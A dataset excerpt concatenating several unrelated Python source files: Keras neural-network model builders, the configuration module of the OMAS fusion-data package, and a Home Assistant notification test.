# FCN
units = self._layer_width
for i in range(self._num_fcn_layer):
layer = keras.layers.Dense(
units=units,
bias_initializer=tf.constant_initializer(0.1),
activation='selu'
)(layer)
units = units // 2
# Output layer
outputs = keras.layers.Dense(
units=1,
bias_initializer=tf.constant_initializer(0.1),
)(layer)
self.model = keras.Model(inputs=feat, outputs=outputs)
self.model._name = self.getName()
return self.model
def compile(self):
decay_lr = DelayedCosineDecayRestarts(
initial_learning_rate=self._lr,
first_decay_steps=self._lr_decay_steps,
decay_start=self._decayed_lr_start,
t_mul=1.02,
m_mul=0.95,
alpha=0.095)
optimizer = tf.keras.optimizers.Adam(
learning_rate=decay_lr
# amsgrad=True
# clipnorm=0.5
# clipvalue=0.1
)
self.model.compile(
optimizer=optimizer,
loss='huber_loss',
# trying to fix 'Inputs to eager execution function cannot be Keras symbolic tensors'
# ref: https://github.com/tensorflow/probability/issues/519
experimental_run_tf_function=False,
metrics=["mse", "mae"])
print(self.model.summary()) | StarcoderdataPython |
11283913 | <reponame>gafusion/omas
'''pypi setup file
-------
'''
# --------------------------------------------
# external imports
# --------------------------------------------
import os
import sys
with open(os.path.abspath(str(os.path.dirname(__file__)) + os.sep + 'version'), 'r') as _f:
__version__ = _f.read().strip()
# Add minor version revisions here
# This is done to keep track of changes between OMAS PYPI releases
# the if statements for these minor revisions can be deleted
# as the OMAS PYPI version increases
if __version__ == '0.66.0':
__version__ += '.1'
if sys.version_info < (3, 5):
raise Exception(
'''
OMAS v%s only runs with Python 3.6+ and you are running Python %s
'''
% (__version__, '.'.join(map(str, sys.version_info[:2])))
)
import pwd
import glob
import json
import copy
from collections import OrderedDict
import re
import numpy
from pprint import pprint
from io import StringIO
from contextlib import contextmanager
import tempfile
import warnings
from functools import wraps
import ast
import base64
import traceback
import difflib
import weakref
import unittest
import itertools
try:
import tqdm
except ImportError:
tqdm = None
formatwarning_orig = warnings.formatwarning
warnings.formatwarning = lambda message, category, filename, lineno, line=None: formatwarning_orig(
message, category, filename, lineno, line=''
)
# pint: avoid loading pint upfront since it can be slow and it is not always used
ureg = []
if False:
import pint
ureg.append(pint.UnitRegistry())
else:
ureg.append(None)
# uncertainties
import uncertainties
import uncertainties.unumpy as unumpy
from uncertainties.unumpy import nominal_values, std_devs, uarray
from uncertainties import ufloat
# xarrays: avoid loading xarrays upfront since it can be slow and it is not always used
# import xarray
from collections.abc import MutableMapping
import pickle
def b2s(bytes):
return bytes.decode("utf-8")
# --------------------------------------------
# configuration of directories and IMAS infos
# --------------------------------------------
class IMAS_json_dir(str):
"""
directory where the JSON data structures for the different versions of IMAS are stored
"""
pass
omas_dir = os.path.abspath(str(os.path.dirname(__file__))) + os.sep
omas_install_dir = os.path.abspath(omas_dir + os.sep + '..') + os.sep
imas_json_dir = IMAS_json_dir(omas_dir + os.sep + 'imas_structures' + os.sep)
omas_git_repo = False
if os.path.exists(omas_install_dir + '.git') and os.access(omas_install_dir + '.git', os.W_OK):
omas_git_repo = True
class IMAS_versions(OrderedDict):
"""
Dictionary with list of IMAS version and their sub-folder name in the imas_json_dir
"""
def __init__(self, mode='all'):
"""
:param mode: `all`, `named`, `tagged`
"""
OrderedDict.__init__(self)
if mode in ['all', 'named']:
# first `develop/3` and other branches
for _item in list(map(lambda x: os.path.basename(x), sorted(glob.glob(imas_json_dir + os.sep + '*')))):
if not _item.startswith('3'):
self[_item.replace('_', '.')] = _item
if mode in ['all', 'tagged']:
# next all tagged versions sorted by version number
for _item in list(map(lambda x: os.path.basename(x), sorted(glob.glob(imas_json_dir + os.sep + '*')))):
if _item.startswith('3'):
self[_item.replace('_', '.')] = _item
# do not include empty imas_structures directories (eg. needed to avoid issues wheen switching to old git branches)
for item, value in list(self.items()):
if not len(glob.glob(imas_json_dir + os.sep + value + os.sep + '*.json')):
del self[item]
# imas versions
imas_versions = IMAS_versions()
if len(list(imas_versions.keys())):
latest_imas_version = list(imas_versions.keys())[-1]
else:
latest_imas_version = '0.0.0'
if 'OMAS_IMAS_VERSION' in os.environ:
_default_imas_version = os.environ['OMAS_IMAS_VERSION']
else:
if len(list(imas_versions.keys())):
_default_imas_version = list(imas_versions.keys())[-1]
else:
_default_imas_version = '0.0.0'
# --------------------------------------------
# rcparams
# --------------------------------------------
class OMAS_rc_params(dict):
"""
dictionary of parameters that control how OMAS operates
"""
pass
omas_rcparams = OMAS_rc_params()
omas_rcparams.update(
{
'cocos': 11,
'consistency_check': True,
'dynamic_path_creation': True,
'tmp_omas_dir': os.environ.get(
'OMAS_TMP_DIR', os.sep.join([tempfile.gettempdir(), os.environ.get('USER', 'dummy_user'), 'OMAS_TMP_DIR'])
),
'fake_imas_dir': os.environ.get(
'OMAS_FAKE_IMAS_DIR', os.sep.join([os.environ.get('HOME', tempfile.gettempdir()), 'tmp', 'OMAS_FAKE_IMAS_DIR'])
),
'allow_fake_imas_fallback': bool(int(os.environ.get('OMAS_ALLOW_FAKE_IMAS_FALLBACK', '0'))),
'default_imas_version': _default_imas_version,
'default_mongo_server': 'mongodb+srv://{user}:{pass}@omasdb-xymmt.mongodb.net',
'pickle_protocol': 4,
}
)
@contextmanager
def rcparams_environment(**kw):
old_omas_rcparams = omas_rcparams.copy()
omas_rcparams.update(kw)
try:
yield omas_rcparams
finally:
omas_rcparams.update(old_omas_rcparams)
# --------------------------------------------
# additional data structures
# --------------------------------------------
add_datastructures = {}
def omas_testdir(filename_topic=''):
"""
Return path to temporary folder where OMAS TEST file are saved/loaded
NOTE: If directory does not exists it is created
:return: string with path to OMAS TEST folder
"""
if filename_topic:
filename_topic = os.path.splitext(os.path.split(filename_topic)[-1])[0] + '/'
tmp = tempfile.gettempdir() + '/OMAS_TESTS/' + filename_topic
if not os.path.exists(tmp):
os.makedirs(tmp)
return tmp
| StarcoderdataPython |
4814504 | from keras.models import Sequential, Model
from keras.layers import Dense, Dropout, Flatten, Activation, MaxPooling2D, Conv2D
from keras import optimizers
from keras import regularizers
from keras import applications
def model(img_size, num_class):
model = Sequential()
model.add(Conv2D(32, (3, 3), input_shape=(img_size, img_size, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(128, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(500, kernel_regularizer=regularizers.l2(0.01)))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(num_class))
model.add(Activation('softmax'))
adam = optimizers.adam(lr=0.001, beta_1=0.9, beta_2=0.999)
model.compile(loss='categorical_crossentropy', optimizer=adam, metrics=['accuracy'])
return model
def tf_model(img_size, num_class):
model = applications.VGG19(weights="imagenet", include_top=False, input_shape=(img_size, img_size, 3))
# Freeze the layers which you don't want to train. Here I am freezing all layers.
for layer in model.layers:
layer.trainable = False
# Adding custom Layers
x = model.output
x = Flatten()(x)
x = Dense(1024, activation="relu")(x)
x = Dropout(0.5)(x)
x = Dense(1024, activation="relu")(x)
predictions = Dense(num_class, activation="softmax")(x)
# creating the final model
model_final = Model(input=model.input, output=predictions)
adam = optimizers.adam(lr=0.001, beta_1=0.9, beta_2=0.999)
# compile the model
model_final.compile(loss="categorical_crossentropy", optimizer=adam, metrics=["accuracy"])
return model_final
| StarcoderdataPython |
310690 | """The tests for the notify.persistent_notification service."""
from homeassistant.components import notify
import homeassistant.components.persistent_notification as pn
from homeassistant.core import HomeAssistant
from homeassistant.setup import async_setup_component
async def test_async_send_message(hass: HomeAssistant):
"""Test sending a message to notify.persistent_notification service."""
await async_setup_component(hass, pn.DOMAIN, {"core": {}})
await async_setup_component(hass, notify.DOMAIN, {})
await hass.async_block_till_done()
message = {"message": "Hello", "title": "Test notification"}
await hass.services.async_call(
notify.DOMAIN, notify.SERVICE_PERSISTENT_NOTIFICATION, message
)
await hass.async_block_till_done()
entity_ids = hass.states.async_entity_ids(pn.DOMAIN)
assert len(entity_ids) == 1
state = hass.states.get(entity_ids[0])
assert state.attributes.get("message") == "Hello"
assert state.attributes.get("title") == "Test notification"
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.